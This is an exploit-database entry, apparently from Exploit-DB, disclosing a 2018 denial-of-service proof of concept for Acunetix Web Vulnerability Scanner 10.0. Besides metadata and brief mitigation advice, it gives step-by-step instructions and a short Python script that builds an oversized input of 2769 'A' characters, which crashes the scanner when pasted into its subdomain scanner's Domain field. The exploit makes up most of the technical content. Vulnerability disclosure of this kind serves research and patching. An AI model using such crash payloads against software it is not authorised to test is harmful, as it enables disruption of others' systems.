header-logo
Suggest Exploit
vendor:
Acunetix Web Vulnerability Scanner
by:
Javier Enrique Rodriguez Gutierrez
5
CVSS
MEDIUM
Denial of Service (PoC)
400
CWE
Product Name: Acunetix Web Vulnerability Scanner
Affected Version From: 10
Affected Version To: 10
Patch Exists: NO
Related CWE:
CPE: a:acunetix:web_vulnerability_scanner:10.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 PRO x86 en
2018

Acunetix Web Vulnerability Scanner 10.0 Build 20150623 – Denial of Service (PoC)

The Acunetix Web Vulnerability Scanner 10.0 Build 20150623 is vulnerable to a denial of service attack. By providing a specially crafted input, an attacker can cause the application to crash, resulting in a denial of service condition.

Mitigation:

Update to a newer version of the Acunetix Web Vulnerability Scanner that addresses this issue.
Source

Exploit-DB raw data:

# Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service (PoC)
# Discovery by: Javier Enrique Rodriguez Gutierrez
# Discovery Date    : 2018-08-11
# Vendor Homepage: https://www.acunetix.com
# Tested Version    : 10.0
# Vulnerability Type    : Denial of Service (PoC)
# Tested on OS  : Windows 10 PRO x86 en
  

# 1 . run python code : python generate.py
# 2 . open generate.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 10.0"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 2769
f = open ("generate.txt", "w")
f.write(buffer)
f.close()